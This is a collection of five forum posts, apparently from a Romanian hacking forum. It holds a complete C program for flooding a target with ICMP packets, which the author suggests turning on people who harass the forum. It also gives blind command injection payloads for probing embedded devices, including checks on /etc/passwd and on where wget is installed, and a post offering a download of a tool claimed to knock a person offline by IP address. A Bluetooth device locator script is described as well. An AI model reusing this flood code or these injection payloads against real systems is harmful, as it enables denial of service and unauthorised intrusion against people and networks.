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  1. https://www.admin.md Astept sugestii in legatura cu functionalul sitului, ce pot sa adaug sau sa scot. Merci
  2. Acest mic programel este scris strict pentru a invata cum sa folosim socket-uri si ICMP ( "echo" requests ). E treaba voastra ce si cum il folositi si o faceti pe propia raspundere. Despre Ping si ICMP: Ping = un instrument de re?ea folosit pentru a verifica dac? un anumit calculator poate fi accesat prin intermediul unei re?ele de tip IP. Ping trimte mesaje ICMP “echo request” (în române?te solicitare de r?spuns) prin pachete adresate host-ului vizat ?i a?teapt? r?spunsul la aceste mesaje venite sub form? de r?spunsuri ICMP “echo response” de la hostul destina?ie. Transmi?ând periodic astfel de pachete ?i calculând întârzierea cu care ajung r?spunsurile, ping estimeaz? timpul de round-trip, precum ?i rata de pierdere a pachetelor dintre host-uri. Codul pe care urmeaza sa il parcurgem trimite pachete in masa ( flood pe romaneste ) asa ca va repet: folositi pe propia raspundere. Ca urmare a flood-urilor primite de RST m-am gandit ca poate vreti sa folositi asta pe propia raspundere impotriva celor care "arunca cu cacat" de plictiseala. Urmarind thread-ul asta am zis ca poate vreti si nu stiti cum Internet Control Message Protocol (abreviat ICMP) = un protocol din suita TCP/IP care folose?te la semnalizarea ?i diagnosticarea problemelor din re?ea. Protocolul este definit in RFC792. Mesajele ICMP sunt încapsulate în interiorul pachetelor IP. Versiunea ICMP ptr IPv4 este adesea cunoscuta ca ICMPv4; in schimb IPv6 dispune de un protocol similar cunoscut sub abrevierea ICMPv6. Probabil cele mai utilizate programe care se bazeaz? pe ICMP sunt ping ?i traceroute. Mai jos am comentat liniile ce mi s-au parut esentiale. In rest, ce nu stiti, google is your friend (asta daca vreti sa stiti). Let's purcedem into the cod: #include "stdio.h" #include "winsock2.h" #include "conio.h" #include "stdint.h" #pragma comment(lib,"ws2_32.lib") //libraria winsock 2.2 #define ICMP_ECHO 8 /* Echo Request - cel explicat in definitia de la ping */ unsigned short in_cksum(unsigned short *ptr, int nbytes); typedef uint8_t u_int8_t; typedef uint16_t u_int16_t; typedef uint32_t u_int32_t; struct icmphdr { u_int8_t type; /* tipul mesajului */ u_int8_t code; /* tip cod */ u_int16_t checksum; union { struct { u_int16_t id; u_int16_t sequence; } echo; /* dam echo la datagram */ u_int32_t gateway; /* addresa gateway */ struct { u_int16_t __unused; u_int16_t mtu; } frag; /* path mtu discovery */ } un; }; int main(int argc, char *argv[]) { char *packet, *data=NULL; SOCKET s; int k = 1, packet_size, payload_size = 512, sent = 0; struct iphdr *iph = NULL; struct icmphdr *icmph = NULL; struct sockaddr_in dest; //Initializare winsock WSADATA wsock; printf("\nInitializare winsock..."); if (WSAStartup(MAKEWORD(2,2),&wsock) != 0) { fprintf(stderr,"WSAStartup() failed"); exit(EXIT_FAILURE); } printf("Terminat !"); //Acum creeam pachetele ICMP if((s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == SOCKET_ERROR) { printf("Eroare la creearea pachetelor raw-icmp"); exit(EXIT_FAILURE); } dest.sin_family = AF_INET; dest.sin_addr.s_addr = inet_addr(""); packet_size = sizeof(struct icmphdr) + payload_size; packet = (char * )malloc(packet_size); //zero out the packet buffer memset (packet, 0, packet_size); icmph = (struct icmphdr*) packet; icmph->type = ICMP_ECHO; icmph->code = 0; icmph->un.echo.sequence = rand(); icmph->un.echo.id = rand(); // initializam payload-ul TCP cu cacaturi data = packet + sizeof(struct icmphdr); memset(data, '^', payload_size); //suma de control icmph->checksum = 0; icmph->checksum = in_cksum((unsigned short *)icmph, packet_size); printf("\nTrimitem pachetele...\n"); while(1) { if(sendto(s , packet , packet_size , 0 , (struct sockaddr *)&dest, sizeof(dest)) == SOCKET_ERROR ) { printf("Eroare la trimiterea pachetelor : %d" , WSAGetLastError()); break; } printf("%d Pachetele au fost trimise cu succes\r" , ++sent); _getch(); } return 0; } /* Functie pt a calcula suma de control( calculata în func?ie de câmpurile antet ICMP + sir de date ) */ unsigned short in_cksum(unsigned short *ptr, int nbytes) { register long sum; u_short oddbyte; register u_short answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } Sursa de mai sus poate fi compilata in visual studio. Creeati un nou proiect, compilati si verificati cu ajutorul unui sniffer de retea (ex: wireshark) daca pachetele ICMP au fost trimise cu succes. Codul de mai sus este un ciot si tre' tratat ca atare. Nu mi-am batut gura cu prea multe chestii teoretice pentru ca oricum 95% vor da copy-paste si vor rupe flood-ul in 15. Sper sa va fie de folos si sa invatati ceva util din el.
  3. When you find an offsec 101 style blind-command injection on embedded systems, you may have difficulties because of their restricted environments. ;ping -c1; Even though you may able to run some commands like ping or reboot... other commands may not work. Since the output was not showing, you cannot be sure if the commands do not exists or they fail for a reason. So, in such scenarios I always check for my injection commands as in the example below: # This command will ping you back if `ls` is found in "/bin" directory ;if test -e "/bin/ls";then ping -c1;fi; # or better ;if test -e "/bin/ls";then ping -c1;else ping -c2;fi; After I see that this approach works, I use more commands to understand my target environment better: # To check if "/tmp" directory exsists? ;if test -d "/tmp";then ping -c2;fi; # To check if "/var/passwd" file is exsists and has read permissions? ;if test -r "/var/passwd";then ping -c2;fi; ;if test -r "/etc/passwd";then ping -c2;fi; # To check if logger exists? -- which is another tricky command used in BlindCI... ;if test -e "/usr/bin/logger";then ping -c1;fi; # To check if wget is exists? ;if test -e "/bin/wget";then ping -c1;fi; ;if test -e "/sbin/wget";then ping -c1;fi; ;if test -e "/usr/bin/wget";then ping -c1;fi; ;if test -e "/usr/sbin/wget";then ping -c1;fi; Note: Embedded systems may differ depending to their build systems(Buildroot, LinuxFromScratch, Yocto...) and/or they can use slightly different versions of well-known commands. Thus, you may need to change some parameters while using those commands. Since we are talking about BLIND COMMAND INJECTION you have to be sure that your injection command/binary is installed on your target. That's why it is a good practice to check your commands in all possible "bin" directories. For example; three commands below does the exact same-thing, however if you try your injection(s) based on just one version you can "assume" that wget does not exists on your Read more: http://dl.packetstormsecurity.net/papers/attack/blind_command_injection_on_busybox.pdf
  4. BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory). Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion. Installation: This script can run from any directory. Resources: BlueZ hcitool l2ping Usage: Provide the local interface and Device Address of the device you are trying to locate. # blueranger.sh hci0 6C:D6:8A:B1:30:BC Download: http://www.hackfromacave.com/download/blueranger.sh
  5. Cu acest program poti pica netul unei persoane stiindu`i ip`u Poza: Link: http://rapidshare.com/files/196088495/Ping.rar.html http://www.filefactory.com/file/afh4d7c/n/ProgrameL_rar http://www.2shared.com/file/4851766/f9de657a/ProgrameL.html Password: www.rstcenter.com Mie imi merge sa vad voua daca va merge(iam dat ping la un prieten si i-o picat netu cam 5 ore) Enjoy!!
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